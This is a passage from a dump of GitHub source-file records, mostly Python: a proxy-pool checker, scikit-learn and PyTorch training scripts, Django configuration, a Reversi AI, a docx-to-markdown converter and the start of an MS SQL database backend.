url=\"https://www.baidu.com/\"\n start=(int)(time.time()*1000)\n try:\n response=requests.get(url=url,headers=headers,proxies=proxies,timeout=5)\n code=response.status_code\n except:\n print(\"代理失效\")\n return\n stop=(int)(time.time()*1000)\n if code==200:\n speed=str(stop-start)\n times=str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(start/1000)))\n sql='''UPDATE address_table1 SET speed=%s,times=\"%s\" WHERE id=%s'''%(speed,times,str(data[0]))\n dbs.cursor().execute(sql)\n sql='''INSERT INTO address_table2(address,type,port,isAnonymity,Location,times,speed) VALUES(\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",%s)'''%(data[1],data[2],data[3],data[4],data[5],times,speed)\n dbs.cursor().execute(sql)\n dbs.commit()\n print(\"IP:\"+data[1]+\" \\t\"+\"time:\"+speed+\"ms\")\ndef delect_data():\n dbs = MySQLdb.connect(host=\"0.0.0.0\", user=\"user\", passwd=\"wydiisasdsd##&user\", db=\"AddressPool\", charset=\"utf8\")\n dbs.cursor().execute(\"TRUNCATE TABLE address_table2\")\n dbs.commit()\n dbs.close()\nif __name__ == '__main__':\n delect_data()\n get_data()\n","repo_name":"Deng872347348/study-learn","sub_path":"crawler-2/spider-crawl-school/线程爬取/ip-proxy-pool/AddressPool/spider/UpdatePool.py","file_name":"UpdatePool.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"25866636786","text":"from sklearn import datasets, neighbors, metrics, mixture, svm\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#keep track of accuracy and best parameter\nbestParam = \"\"\nmodelAccuracy = \"\"\ndef loadDS(name):\n # we have 3 values here iris, breast-cancer, wine\n # no else block required cause we use radio button and each RB has associated value\n if name == \"iris\":\n return datasets.load_iris()\n if name == \"breast-cancer\":\n return datasets.load_breast_cancer()\n if name == \"wine\":\n return datasets.load_wine()\n\ndef classification(name, alg, fold, checkMessage):\n global bestParam, modelAccuracy\n #loading selected dataset\n df = loadDS(name)\n\n # target and training data\n X = df.data\n y = df.target\n class_names = df.target_names\n\n # train test split\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\n # will check for knn and svm algorithms\n if alg == \"knn\":\n classAlg = neighbors.KNeighborsClassifier()\n param = [{\"n_neighbors\" : range(1, 50)}]\n xLabel = \"KNN\"\n elif alg == \"svm\":\n classAlg = svm.SVC()\n param = [{\"gamma\" : [0.0001, 0.001, 0.01, 0.1, 1]}]\n xLabel = \"SVC\"\n\n # creating a gridsearchcv object and passing classification alg, fold value and parameter\n gscv_classifier = GridSearchCV(\n estimator= classAlg,\n param_grid= param,\n cv = fold,\n scoring= \"accuracy\"\n )\n\n #using the gscv classifier to train the training data\n gscv_classifier.fit(X_train, y_train)\n\n #taking from tutorial\n print(\"Grid scores on validation set\")\n print()\n means = gscv_classifier.cv_results_[\"mean_test_score\"]\n stds = gscv_classifier.cv_results_[\"std_test_score\"]\n results = gscv_classifier.cv_results_[\"params\"]\n\n for mean, std, param in zip(means, stds, results):\n print(\"Parameter: %r, accuracy: %0.3f (+/-%0.03f)\" % (param, mean,\n std * 2))\n print()\n print(\"Best parameter: \", gscv_classifier.best_params_)\n bestParam += str(gscv_classifier.best_params_)\n checkMessage.insert(\"end\", f\"Best parameter : {bestParam}\\n\")\n\n\n #using trhe gscv classfier on test dataset\n y_pred = gscv_classifier.predict(X_test)\n\n # collecting all the dictionary values to xVal\n #plot againg means\n xVal = []\n for i in results:\n xVal.append(list(i.values())[0])\n\n #plotting confusion matrix and accuracy\n accuracy = metrics.accuracy_score(y_test, y_pred) * 100\n # modelAccuracy = str(accuracy)\n # checkMessage.insert(\"end\", f\"Accuracy : {modelAccuracy}\")\n plotcm = metrics.plot_confusion_matrix(gscv_classifier, X_test, y_test, display_labels = class_names)\n plotcm.ax_.set_title(\"Accuracy = {0:.2f}%\".format(accuracy))\n plt.show()\n\n # x_axis = list(results[0:len(results)].values())\n x_axis = xVal\n y_axis = means\n plot_axes = plt.axes()\n plt.xlabel(xLabel)\n plt.ylabel('CV score')\n plot_axes.plot(x_axis, y_axis)\n plt.show()","repo_name":"Adnan525/dataClassificationGUI","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15008540735","text":"\"\"\"geotravel URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.contrib import admin\nfrom django.urls import path, include, resolve, reverse\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom froala_editor import views\n\n\nurlpatterns = [\n path('geomin/', admin.site.urls),\n path('froala_editor/', include('froala_editor.urls')),\n url(r'^i18n/', include('django.conf.urls.i18n')),\n]\n\nurlpatterns += i18n_patterns(\n path(\"\", include(\"geotravel_app.urls\")),\n path(\"tours/\", include(\"tours.urls\")),\n path(\"guides/\", include(\"guides.urls\")),\n path('transport/', include('transport.urls')),\n prefix_default_language=False,\n)\n\nurlpatterns += [\n path('geotranslate/', include('rosetta.urls')),\n]\n\nhandler404 = 'geotravel_app.views.error_404'\n\n# not for production\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"KamilRAliyev/geo-travel-source","sub_path":"geotravel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"74489809007","text":"from utils.dataset import ECG5000\nfrom models.RecurrentAutoencoder import RecurrentAutoencoder\nimport torch\nimport torch.nn as nn\nimport copy\nfrom tqdm import tqdm\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\n\n# https://curiousily.com/posts/time-series-anomaly-detection-using-lstm-autoencoder-with-pytorch-in-python/\n\nif __name__ == '__main__':\n\n dataset_normal = ECG5000(mode='normal')\n dataset_anomaly = ECG5000(mode='anomaly')\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n seq_len, n_features = 140, 1\n batch_size = 512\n\n ################################\n validation_split = test_split = 0.15\n random_seed = 42\n\n # Creating data indices for training and validation splits:\n dataset_size = len(dataset_normal)\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split * dataset_size))\n\n # suffling\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices, test_indices = indices[split:], indices[:split]\n train_indices, val_indices = train_indices[split:], train_indices[:split]\n\n print('train_indices: ', len(train_indices))\n print('val_indices: ', len(val_indices))\n print('test_indices: ', len(test_indices))\n\n # check all splits have no intersections\n assert not [value for value in train_indices if value in test_indices]\n assert not [value for value in train_indices if value in val_indices]\n assert not [value for value in val_indices if value in test_indices]\n ##############################\n\n model = RecurrentAutoencoder(seq_len, n_features=n_features, embedding_dim=128, device=device, batch_size=batch_size)\n\n # Creating PT data samplers and loaders:\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n test_sampler = SubsetRandomSampler(test_indices)\n\n train_loader = torch.utils.data.DataLoader(dataset_normal, batch_size=batch_size, sampler=train_sampler)\n validation_loader = torch.utils.data.DataLoader(dataset_normal, batch_size=batch_size, sampler=valid_sampler)\n test_loader = torch.utils.data.DataLoader(dataset_normal, batch_size=batch_size, sampler=test_sampler)\n anomaly_loader = torch.utils.data.DataLoader(dataset_anomaly, batch_size=batch_size)\n\n\n # x = dataset.get_torch_tensor()\n # z = model.encoder(x) # z.shape = [7]\n # x_prime = model.decoder(z, seq_len=10) # x_prime.shape = [10, 3]\n #\n # z = model(x)\n #\n # print(x.shape)\n\n # start training\n n_epochs = 500\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n criterion = nn.MSELoss(reduction='mean').to(device) # todo article use L1Loss\n history = dict(train=[], val=[])\n best_model_wts = copy.deepcopy(model.state_dict())\n best_loss = 10000.0\n\n for epoch in tqdm(range(1, n_epochs + 1)):\n model = model.train()\n\n train_losses = []\n val_losses = []\n test_losses = []\n anomaly_losses = []\n\n for i, seq_true in enumerate(train_loader):\n optimizer.zero_grad()\n seq_true = seq_true.to(device)\n seq_pred = model(seq_true)\n loss = criterion(seq_pred, seq_true)\n loss.backward()\n optimizer.step()\n train_losses.append(loss.item())\n\n model = model.eval()\n with torch.no_grad():\n\n # validation steps\n for i, seq_true in enumerate(validation_loader):\n seq_true = seq_true.to(device)\n seq_pred = model(seq_true)\n loss = criterion(seq_pred, seq_true)\n val_losses.append(loss.item())\n\n # normal_test steps\n for i, seq_true in enumerate(test_loader):\n seq_true = seq_true.to(device)\n seq_pred = model(seq_true)\n loss = criterion(seq_pred, seq_true)\n test_losses.append(loss.item())\n\n # anomaly_test steps\n for i, seq_true in enumerate(anomaly_loader):\n seq_true = seq_true.to(device)\n seq_pred = model(seq_true)\n loss = criterion(seq_pred, seq_true)\n anomaly_losses.append(loss.item())\n\n train_loss = np.mean(train_losses)\n val_loss = np.mean(val_losses)\n test_loss = np.mean(test_losses)\n anomaly_loss = np.mean(anomaly_losses)\n history['train'].append(train_loss)\n print(f'Epoch {epoch}: train loss {train_loss} {\" \"*6} val loss {val_loss} {\" \"*6} test loss {test_loss} {\" \"*6} anomaly loss {anomaly_loss}')\n\n model.load_state_dict(best_model_wts)","repo_name":"fabiozappo/LSTM-Autoencoder-Time-Series","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"} +{"seq_id":"73181342447","text":"from node import Node\nimport reversiutils as ru\nimport time\n\n\nclass MyPlayer(object):\n \"\"\"\n Uses MiniMax with alpha-beta pruning for the first 0.5 sec heuristic evaluation afterwards\n \"\"\"\n\n MAX_WAITING_TIME = 0.5\n # weights for heuristic evaluation\n SQUARE_WEIGHTS = [\n 200, -100, 100, 50, 50, 100, -100, 200,\n -100, -200, -50, -50, -50, -50, -200, -100,\n 100, -50, 100, 0, 0, 100, -50, 100,\n 50, -50, 0, 0, 0, 0, -50, 50,\n 50, -50, 0, 0, 0, 0, -50, 50,\n 100, -50, 100, 0, 0, 100, -50, 100,\n -100, -200, -50, -50, -50, -50, -200, -100,\n 200, -100, 100, 50, 50, 100, -100, 200,\n ]\n\n def __init__(self, my_color, opponent_color):\n self.name = 'izotomas'\n self.my_color = my_color\n self.opponent_color = opponent_color\n self.start_time = 0\n\n def move(self, board):\n board1d = ru.flatten(board)\n root = Node(board1d, self.my_color, self.opponent_color)\n self.start_time = time.time()\n root.children = root.get_children()\n if not root.children:\n return None\n best_move = self.__alpha_beta_search(root)\n return best_move\n\n # region Helpers\n\n def __alpha_beta_search(self, node):\n self.__max_value(node, Node.DEFAULT_SCORE, Node.DEFAULT_SCORE * (-1))\n best_node = max(node.children)\n coordinates = ru.index_to_cartesian(best_node.move)\n return coordinates\n\n def __max_value(self, node, alpha, beta):\n node.children = node.get_children()\n if self.__is_terminal_state(node):\n return self.__evaluate(node)\n for child in node.children:\n node.score = max(node.score, self.__min_value(child, alpha, beta))\n if node.score >= beta:\n return node.score\n alpha = max(alpha, node.score)\n return node.score\n\n def __min_value(self, node, alpha, beta):\n node.children = node.get_children()\n if self.__is_terminal_state(node):\n return self.__evaluate(node)\n for child in node.children:\n node.score = min(node.score, self.__max_value(child, alpha, beta))\n if node.score <= alpha:\n return node.score\n beta = min(beta, node.score)\n return node.score\n\n def __is_terminal_state(self, node):\n move_time = (time.time() - self.start_time)\n time_expired = move_time > MyPlayer.MAX_WAITING_TIME\n no_children = not node.children\n return time_expired or no_children\n\n @staticmethod\n def __evaluate(node):\n free_position_count = node.board.count(-1)\n if not node.children or free_position_count == 0:\n return ru.utility(node) * 10000\n\n if free_position_count > 45:\n return ru.mobility(node) + \\\n 4 * ru.positional_strength(node, MyPlayer.SQUARE_WEIGHTS) + \\\n 100 * ru.corners(node)\n\n if free_position_count > 30:\n return 10 * ru.parity(node) + \\\n 5 * ru.mobility(node) + \\\n 10 * ru.positional_strength(node, MyPlayer.SQUARE_WEIGHTS) + \\\n 100 * ru.corners(node)\n\n else:\n return 500 * ru.parity(node) + \\\n 1000 * ru.positional_strength(node, MyPlayer.SQUARE_WEIGHTS) + \\\n 1000 * ru.corners(node)\n\n # endregion\n","repo_name":"izotomas/CVUT---Cybernetics-and-AI","sub_path":"labs/reversi/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8959023858","text":"from typing import Dict, Text, Union\n\nimport attr\n\nfrom digicubes_flask import CurrentUser, current_user, digicubes\nfrom digicubes_flask.client.model import RoleModel, SchoolModel, UserModel\nfrom digicubes_flask.web.account_manager import DigicubesAccountManager\n\nserver: DigicubesAccountManager = digicubes\nuser: CurrentUser = current_user\n\nValueType = Union[str, float, int, bool]\nDataType = Dict[Text, ValueType]\n\n\n@attr.s(auto_attribs=True)\nclass RfcRequest:\n # pylint: disable=C0111\n function_name: Text\n data: DataType = {}\n\n\n@attr.s(auto_attribs=True)\nclass RfcResponse:\n # pylint: disable=C0111\n status: int = 200\n text: Text = \"ok\"\n data: DataType = {}\n\n\nclass RfcError(Exception):\n pass\n\n\nclass AdminRFC:\n\n STATUS_OK = 200\n\n @staticmethod\n def rfc_user_set_active_state(data: DataType) -> RfcResponse:\n user_id = data.get(\"user_id\", None)\n mode = data.get(\"mode\", \"toggle\")\n\n user = server.user.get(server.token, user_id, fields=[\"is_active\"])\n new_state = user.is_active\n\n if mode == \"toggle\":\n new_state = not new_state\n elif mode == \"on\":\n new_state = True\n elif mode == \"off\":\n new_state = False\n else:\n raise ValueError(\"Unknown mode\")\n\n if new_state != user.is_active:\n server.user.update(server.token, UserModel(id=user_id, is_active=new_state))\n\n return RfcResponse(data={\"user_id\": user_id, \"state\": new_state})\n\n @staticmethod\n def rfc_user_toggle_role(data: DataType) -> RfcResponse:\n user_id = data.get(\"user_id\", None)\n role_id = data.get(\"role_id\", None)\n operation = data.get(\"operation\", \"toggle\")\n\n assert user_id is not None, \"No user id provided\"\n assert role_id is not None, \"No role id provided\"\n\n if operation == \"add\":\n server.user.add_role(\n server.token, UserModel(id=user_id), RoleModel(id=role_id, name=\"xxx\")\n )\n return RfcResponse(data={\"user_id\": user_id, \"role_id\": role_id, \"has_role\": True})\n\n if operation == \"remove\":\n server.user.remove_role(\n server.token, UserModel(id=user_id), RoleModel(id=role_id, name=\"xxx\")\n )\n return RfcResponse(data={\"user_id\": user_id, \"role_id\": role_id, \"has_role\": False})\n\n raise ValueError(f\"Unknown or unsupported operation '{operation}'\")\n\n @staticmethod\n def rfc_school_get_course_info(data: DataType) -> RfcResponse:\n school_id = data.get(\"school_id\", None)\n assert school_id is not None, \"No school id provided\"\n courses = server.school.get_courses(server.token, SchoolModel(id=school_id))\n # TODO: An dieser stelle brauche ich nicht alle Felder der\n # Kurse. Aber die Methode get_courses unterstützt das\n\n private_courses = list([c.id for c in courses if c.is_private])\n return RfcResponse(\n data={\"count_courses\": len(courses), \"count_private_courses\": len(private_courses)}\n )\n\n @staticmethod\n def rfc_user_set_verified_state(data: DataType) -> RfcResponse:\n user_id = data.get(\"user_id\", None)\n assert user_id is not None, \"No user id provided\"\n\n mode = data.get(\"mode\", \"toggle\")\n\n user = server.user.get(server.token, user_id, fields=[\"is_verified\"])\n new_state = user.is_verified\n\n if mode == \"toggle\":\n new_state = not new_state\n elif mode == \"on\":\n new_state = True\n elif mode == \"off\":\n new_state = False\n else:\n raise ValueError(\"Unknown mode\")\n\n if new_state != user.is_verified:\n u = UserModel(id=user_id, is_verified=new_state)\n u = server.user.update(server.token, u)\n\n return RfcResponse(data={\"user_id\": user_id, \"state\": new_state})\n\n @staticmethod\n def no_such_function(request: RfcRequest) -> RfcResponse:\n\n return RfcResponse(status=404, text=\"No such function\")\n\n @staticmethod\n def no_function(request: RfcRequest) -> RfcResponse:\n\n return RfcResponse(status=400, text=\"Bad request. No function name provided.\")\n\n @staticmethod\n def call(request: RfcRequest) -> RfcResponse:\n if request.function_name is None:\n return AdminRFC.no_such_function(request)\n\n method = getattr(AdminRFC, f\"rfc_{request.function_name.lower()}\", None)\n if method is None:\n return AdminRFC.no_such_function(request)\n\n if not callable(method):\n return AdminRFC.no_such_function(request)\n\n return method(request.data)\n","repo_name":"FirstKlaas/digicubes-flask","sub_path":"digicubes_flask/web/modules/admin/rfc.py","file_name":"rfc.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21003861921","text":"num_tests = int(input())\n\nfor x in range(num_tests):\n str_length = int(input())\n given_str = input()\n counter = 0\n for x in given_str:\n if x == 'a' or x == 'e' or x == 'i' or x == 'o' or x == 'u':\n counter = 0\n #print(counter)\n else:\n counter = counter + 1\n #print(counter)\n if counter >= 4:\n break;\n if counter >= 4:\n print(\"NO\")\n else: \n print(\"YES\")","repo_name":"vjks/python-programs","sub_path":"CodeChef/easy_pronunciation.py","file_name":"easy_pronunciation.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73152658285","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\n# Create your models here.\nESTADO_CHOICES = [\n ('OLD', 'Usado'),\n ('NEW', 'Nuevo'),\n ]\nTIPO_CHOICES = [\n ('AU', 'Auto'),\n ('MO', 'Moto'),\n ('CA', 'Camion'),\n ]\nCAMBIOS_CHOICES = [\n ('AU', 'Automatico'),\n ('MA', 'Manual'),\n ]\nCOMBUSTIBLE_CHOICES = [\n ('AU', 'Auto'),\n ('MO', 'Moto'),\n ('CA', 'Camion'),\n ]\nPUERTAS_CHOICES = [\n ('3', 'Tres Puertas'),\n ('5', 'Cinco Puertas'),\n ]\nASIENTOS_CHOICES = [\n ('2', 'Dos Asientos'),\n ('5', 'Cinco Asientos'),\n ]\nclass Vehiculo(models.Model):\n nombre = models.CharField(max_length=50)\n fotoPortada = models.ImageField(max_length=100, upload_to='portadas/', blank=True)\n modelo = models.CharField(max_length=50)\n version = models.CharField(max_length=50)\n año = models.IntegerField(validators=[MinValueValidator(1900), MaxValueValidator(3000)])\n estado = models.CharField(\n max_length=3,\n choices=ESTADO_CHOICES,\n )\n\n def __str__(self):\n return self.nombre","repo_name":"cettipao/ariesautomotores","sub_path":"aries/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"19470284855","text":"import math\n\nfor _ in range(int(input())):\n num = int(input())\n s = num * (num + 1) // 2\n if s % 2 == 0:\n temp = int((math.sqrt(4 + 8 * (num * num + num)) - 2) // 4)\n res = num - temp\n if temp * (temp + 1) // 2 == s // 2:\n res += (temp * (temp - 1) // 2) + ((num - temp) * ((num - temp) - 1) // 2)\n print(res)\n else:\n print(0)","repo_name":"ShivArora-Sykkuno/Collage-Assignments","sub_path":"CHFNSWAP.py","file_name":"CHFNSWAP.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21709352256","text":"raw_text = str(input(\"Key in something you want to encrpyt please!\"))\r\ndecoded = \"\"\r\n\r\nfinal = []\r\nfinal_1 = []\r\n\r\nfor i in raw_text:\r\n conversion_1 = i\r\n conversion_2 = ord(conversion_1)\r\n conversion_2 = (conversion_2 * 7) + 23\r\n final.append(conversion_2)\r\n\r\nprint(final)\r\n\r\nfor ii in final:\r\n conversion_3 = ii\r\n conversion_4 = (conversion_3 - 23) / 7\r\n final_1.append(conversion_4)\r\n\r\nprint(final_1)\r\n\r\nfor i in final_1:\r\n decoded += chr(int(i))\r\n\r\nprint(decoded)\r\n\r\n","repo_name":"YEOWEIHNGWHYELAB/Lousy-Encryption","sub_path":"Basic_Encryption.py","file_name":"Basic_Encryption.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26234303297","text":"import re\r\nimport io\r\nimport os.path\r\nimport collections\r\n\r\n\r\nfrom lxml import etree\r\n\r\nfrom . import utils\r\n\r\n\r\nclass Converter:\r\n def __init__(self, xml_text, media, use_md_table):\r\n self.tree = etree.fromstring(xml_text)\r\n utils.strip_ns_prefix(self.tree)\r\n self.media = media\r\n self.image_counter = self.counter()\r\n self.table_counter = self.counter()\r\n self.use_md_table = use_md_table\r\n\r\n def counter(self, start=1):\r\n count = start - 1\r\n\r\n def inc():\r\n nonlocal count\r\n count += 1\r\n return count\r\n\r\n return inc\r\n\r\n def convert(self):\r\n self.in_list = False\r\n\r\n of = io.StringIO()\r\n body = self.get_first_element(self.tree, \"//body\")\r\n self.parse_node(of, body)\r\n\r\n return re.sub(r\"\\n{2,}\", \"\\n\\n\", of.getvalue()).strip()\r\n\r\n def get_first_element(self, node, xpath):\r\n tags = node.xpath(xpath)\r\n return tags[0] if len(tags) > 0 else None\r\n\r\n def get_sub_text(self, node):\r\n of = io.StringIO()\r\n self.parse_node(of, node)\r\n return of.getvalue().strip()\r\n\r\n def parse_node(self, of, node):\r\n if node is None:\r\n return\r\n\r\n for child in node.getchildren():\r\n tag_name = child.tag\r\n if tag_name == \"sdt\": # skip Table of Contents\r\n continue\r\n elif tag_name == \"p\":\r\n self.parse_p(of, child)\r\n elif tag_name == \"br\":\r\n if child.attrib.get(\"type\") == \"page\":\r\n print('\\n
\\n', file=of)\r\n else:\r\n print(\"
\", end=\"\", file=of)\r\n elif tag_name == \"t\":\r\n print(child.text or \" \", end=\"\", file=of)\r\n elif tag_name == \"drawing\":\r\n self.parse_drawing(of, child)\r\n elif tag_name == \"tbl\":\r\n self.parse_tbl(of, child)\r\n else:\r\n self.parse_node(of, child)\r\n\r\n def parse_tbl(self, of, node):\r\n properties = self.get_table_properties(node)\r\n if self.use_md_table:\r\n self.emit_md_table(of, node, len(properties[0]))\r\n else:\r\n self.emit_html_table(of, node, properties)\r\n\r\n def emit_md_table(self, of, node, col_size):\r\n print(\"\", file=of)\r\n print(\"| # \" * (col_size) + \"|\", file=of)\r\n print(\"|---\" * col_size + \"|\", file=of)\r\n for tag_tr in node.xpath(\".//tr\"):\r\n print(\"|\", end=\"\", file=of)\r\n for tag_tc in tag_tr.xpath(\".//tc\"):\r\n span = 1\r\n gridSpan = self.get_first_element(tag_tc, \".//gridSpan\")\r\n if gridSpan is not None:\r\n span = int(gridSpan.attrib[\"val\"])\r\n sub_text = self.get_sub_text(tag_tc)\r\n text = re.sub(r\"\\n+\", \"
\", sub_text)\r\n print(text, end=\"\", file=of)\r\n print(\"|\" * span, end=\"\", file=of)\r\n gridAfter = self.get_first_element(tag_tr, \".//gridAfter\")\r\n if gridAfter is not None:\r\n val = int(gridAfter.attrib[\"val\"])\r\n print(\"|\" * val, end=\"\", file=of)\r\n print(\"\", file=of)\r\n print(\"\", file=of)\r\n\r\n def emit_html_table(self, of, node, properties):\r\n id = f\"table{self.table_counter()}\"\r\n print(f'\\n', file=of)\r\n for y, tr in enumerate(node.xpath(\".//tr\")):\r\n print(\"\", file=of)\r\n x = 0\r\n for tc in tr.xpath(\".//tc\"):\r\n prop = properties[y][x]\r\n colspan = prop.span\r\n attr = \"\" if colspan <= 1 else f' colspan=\"{colspan}\"'\r\n rowspan = prop.merge_count\r\n attr += \"\" if rowspan == 0 else f' rowspan=\"{rowspan}\"'\r\n\r\n sub_text = self.get_sub_text(tc)\r\n text = re.sub(r\"\\n+\", \"
\", sub_text)\r\n if not prop.merged or prop.merge_count != 0:\r\n print(f\"{text}\", file=of)\r\n x += colspan\r\n gridAfter = self.get_first_element(tr, \".//gridAfter\")\r\n if gridAfter is not None:\r\n val = int(gridAfter.attrib[\"val\"])\r\n for _ in range(val):\r\n print(\"\", file=of)\r\n print(\"\", file=of)\r\n print(\"
\", file=of)\r\n\r\n def get_table_properties(self, node):\r\n CellProperty = collections.namedtuple(\r\n \"CellProperty\", [\"span\", \"merged\", \"merge_count\"]\r\n )\r\n properties = []\r\n for tr in node.xpath(\".//tr\"):\r\n row_properties = []\r\n for tc in tr.xpath(\".//tc\"):\r\n span = 1\r\n gridSpan = self.get_first_element(tc, \".//gridSpan\")\r\n if gridSpan is not None:\r\n span = int(gridSpan.attrib[\"val\"])\r\n merged = False\r\n merge_count = 0\r\n vMerge = self.get_first_element(tc, \".//vMerge\")\r\n if vMerge is not None:\r\n merged = True\r\n val = vMerge.attrib.get(\"val\")\r\n merge_count = 1 if val == \"restart\" else 0\r\n prop = CellProperty(span, merged, merge_count)\r\n row_properties.append(prop)\r\n for _ in range(span - 1):\r\n row_properties.append(\r\n CellProperty(0, prop.merged, prop.merge_count)\r\n )\r\n gridAfter = self.get_first_element(tr, \".//gridAfter\")\r\n if gridAfter is not None:\r\n val = int(gridAfter.attrib[\"val\"])\r\n for _ in range(val):\r\n row_properties.append(CellProperty(1, False, 0))\r\n properties.append(row_properties)\r\n\r\n for y in range(len(properties) - 1):\r\n for x in range(len(properties[0])):\r\n prop = properties[y][x]\r\n if prop.merge_count > 0:\r\n count = 0\r\n for ynext in range(y + 1, len(properties)):\r\n cell = properties[ynext][x]\r\n if cell.merged and cell.merge_count == 0:\r\n count += 1\r\n elif not cell.merged or cell.merge_count > 0:\r\n break\r\n properties[y][x] = CellProperty(\r\n prop.span, prop.merged, prop.merge_count + count\r\n )\r\n return properties\r\n\r\n def parse_p(self, of, node):\r\n \"\"\"paragraph, list, heading\"\"\"\r\n pStyle = self.get_first_element(node, \".//pStyle\")\r\n if pStyle is None:\r\n if self.in_list:\r\n self.in_list = False\r\n print(\"\", file=of)\r\n self.parse_node(of, node)\r\n print(\"\", file=of)\r\n return\r\n\r\n sub_text = self.get_sub_text(node)\r\n if not sub_text:\r\n return\r\n\r\n if not self.in_list:\r\n print(\"\", file=of)\r\n self.in_list = True\r\n\r\n style = pStyle.attrib[\"val\"]\r\n if style.isdigit():\r\n print(\"#\" * (int(style)), sub_text, file=of)\r\n elif style[0] == \"a\":\r\n ilvl = self.get_first_element(node, \".//ilvl\")\r\n if ilvl is None:\r\n return\r\n level = int(ilvl.attrib[\"val\"])\r\n print(\" \" * level + \"*\", sub_text, file=of)\r\n else:\r\n raise RuntimeError(\"pStyle: \" + style)\r\n\r\n def parse_drawing(self, of, node):\r\n \"\"\"pictures\"\"\"\r\n blip = self.get_first_element(node, \".//blip\")\r\n if blip is None:\r\n return\r\n\r\n embed_id = blip.attrib.get(\"embed\")\r\n if embed_id is None or embed_id not in self.media:\r\n return\r\n\r\n tag_id = f\"image{self.image_counter()}\"\r\n print(f'', end=\"\", file=of)","repo_name":"rfrezende/docx2md","sub_path":"docx2md/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"19086099133","text":"import sys\nimport logging\nfrom time import time\nimport pyodbc as Database\n\nfrom orun.db import utils\nfrom orun.core.exceptions import ImproperlyConfigured\nfrom orun.db.backends.base.base import BaseDatabaseWrapper\nimport orun.db.backends.utils\nfrom .schema import DatabaseSchemaEditor\nfrom .client import DatabaseClient\nfrom .creation import DatabaseCreation\nfrom .features import DatabaseFeatures\nfrom .introspection import DatabaseIntrospection\nfrom .operations import DatabaseOperations\n\nlogger = logging.getLogger('orun.db.backends')\n\n\nclass DatabaseWrapper(BaseDatabaseWrapper):\n connection: Database.Connection\n vendor = 'mssql'\n display_name = 'MS SQL Server'\n\n data_types = {\n 'AutoField': 'int',\n 'BigAutoField': 'bigint',\n 'BinaryField': 'varbinary',\n 'BooleanField': 'bit',\n 'CharField': 'varchar(%(max_length)s)',\n 'DateField': 'date',\n 'DateTimeField': 'datetime',\n 'DecimalField': 'decimal(%(max_digits)s, %(decimal_places)s)',\n 'DurationField': 'bigint',\n 'FileField': 'varchar(%(max_length)s)',\n 'FilePathField': 'varchar(%(max_length)s)',\n 'FloatField': 'float',\n 'IntegerField': 'int',\n 'BigIntegerField': 'bigint',\n 'IPAddressField': 'char(15)',\n 'GenericIPAddressField': 'char(39)',\n 'OneToOneField': 'bigint',\n 'PositiveIntegerField': 'int',\n 'PositiveSmallIntegerField': 'smallint',\n 'SlugField': 'varchar(%(max_length)s)',\n 'SmallIntegerField': 'smallint',\n 'TextField': 'varchar(max)',\n 'TimeField': 'time',\n 'UUIDField': 'uniqueidentifier',\n }\n\n data_types_suffix = {\n 'AutoField': 'IDENTITY',\n 'BigAutoField': 'IDENTITY',\n }\n\n operators = {\n 'exact': '= %s',\n 'iexact': '= UPPER(%s)',\n 'contains': 'LIKE %s',\n 'icontains': 'LIKE UPPER(%s)',\n 'regex': 'LIKE %s',\n 'iregex': 'LIKE %s',\n 'gt': '> 